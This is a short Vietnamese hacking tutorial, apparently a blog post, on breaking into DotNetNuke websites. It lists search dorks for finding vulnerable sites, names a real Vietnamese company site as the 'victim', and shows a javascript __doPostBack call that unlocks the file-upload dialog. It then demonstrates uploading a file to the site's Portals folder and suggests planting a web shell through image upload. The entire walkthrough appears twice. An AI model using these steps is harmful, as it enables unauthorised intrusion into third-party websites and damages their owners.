Hack forum với method DNN tìm các forum lỗi với dork chính sau inurl:/portals/0/default.aspx inurl:/tabid/36/language/en-US/Default.aspx Mìn...
Hack forum với method DNN
tìm các forum lỗi với dork chính sau
inurl:/portals/0/default.aspx
inurl:/tabid/36/language/en-US/Default.aspx
Mình tùy biến đi để có dork cho site việt nam nhé
inurl:"/portals/0? site:..vn
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi4skra0JTm2r-HE92K8SLgrEsc4v-LfV55TS47XERLwKd6U32Q_ntov9idq3mTRNEBryvekgcEVD6pPbO5N06gq6gZlHXOrxPzBSRCl0xHkezp7NVQBx6yF8p5Y0VrqNysLUXSdrA6i0/s1600/2.png)
chọn 1 thằng làm victim nhé,
mình chọn thằng này
http://www.viglaceraland.vn/
chạy trên browser
http://www.viglaceraland.vn/Provider...nkgallery.aspx
sẽ cho như sau
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5pN-3AsSlYu-6ghL_ONRORJYIyJpTf0JTtCdHjlQ3w4DwK2zYqF6ZgHSllhGlmAMl0gUfHxXgDXwkRrc6DNO4V2k-927ZVzgcFIOYRryR-FH8eS_Lf3tM3IGvme7Huj4YROk7ZXIG0gM/s320/1.png)
nó ko cho up file từ máy tính
ta chạy script sau javascript:__doPostBack('ctlURL$cmdUpload','')
thì nhận đc là
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZEB6rvMoxALWPqG4u3PWYj_I-tXOFsINHRFHouAJ8sN4CSiZYb6FCQMm39NFveLfT9We2JVQnrv9EiSU5sZ7f4hfbLa3JnWFvG05FBVR6dEZu3updv5X6egWWid6Uo70Ploj_9md061c/s320/3.png)
nó đã cho up load từ máy tính nhé.ta up thử 1 file txt nào
up file capuchino.txt nhé
chạy thử nha http://www.viglaceraland.vn/Portals/0/capuchino.txt
--->từ đây suy ra đường dẫn các file tương tự nhé
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBvg8di3yN4OcedrhBclqi4LgVh43WW8PawLIeMQNQ6TuMomJHptDtobjiZ3tjNpKbKmgJw4M4UnMnWtBKwVdMpOijSJLR1BngntdIeM5qXmCaOZL3CySX9WRCzyv7xlHkTNtjfZctjAQ/s1600/4.png)
nó cho up file ảnh,thì ta có thể up shell thông qua up file ảnh nha,trên firefox mình ko chạy javascript đc nên ko demo chỗ này đc ^^ :v
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgi4skra0JTm2r-HE92K8SLgrEsc4v-LfV55TS47XERLwKd6U32Q_ntov9idq3mTRNEBryvekgcEVD6pPbO5N06gq6gZlHXOrxPzBSRCl0xHkezp7NVQBx6yF8p5Y0VrqNysLUXSdrA6i0/s1600/2.png)
chọn 1 thằng làm victim nhé,
mình chọn thằng này
http://www.viglaceraland.vn/
chạy trên browser
http://www.viglaceraland.vn/Provider...nkgallery.aspx
sẽ cho như sau
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5pN-3AsSlYu-6ghL_ONRORJYIyJpTf0JTtCdHjlQ3w4DwK2zYqF6ZgHSllhGlmAMl0gUfHxXgDXwkRrc6DNO4V2k-927ZVzgcFIOYRryR-FH8eS_Lf3tM3IGvme7Huj4YROk7ZXIG0gM/s320/1.png)
nó ko cho up file từ máy tính
ta chạy script sau javascript:__doPostBack('ctlURL$cmdUpload','')
thì nhận đc là
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZEB6rvMoxALWPqG4u3PWYj_I-tXOFsINHRFHouAJ8sN4CSiZYb6FCQMm39NFveLfT9We2JVQnrv9EiSU5sZ7f4hfbLa3JnWFvG05FBVR6dEZu3updv5X6egWWid6Uo70Ploj_9md061c/s320/3.png)
nó đã cho up load từ máy tính nhé.ta up thử 1 file txt nào
up file capuchino.txt nhé
chạy thử nha http://www.viglaceraland.vn/Portals/0/capuchino.txt
--->từ đây suy ra đường dẫn các file tương tự nhé
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBvg8di3yN4OcedrhBclqi4LgVh43WW8PawLIeMQNQ6TuMomJHptDtobjiZ3tjNpKbKmgJw4M4UnMnWtBKwVdMpOijSJLR1BngntdIeM5qXmCaOZL3CySX9WRCzyv7xlHkTNtjfZctjAQ/s1600/4.png)
nó cho up file ảnh,thì ta có thể up shell thông qua up file ảnh nha,trên firefox mình ko chạy javascript đc nên ko demo chỗ này đc ^^ :v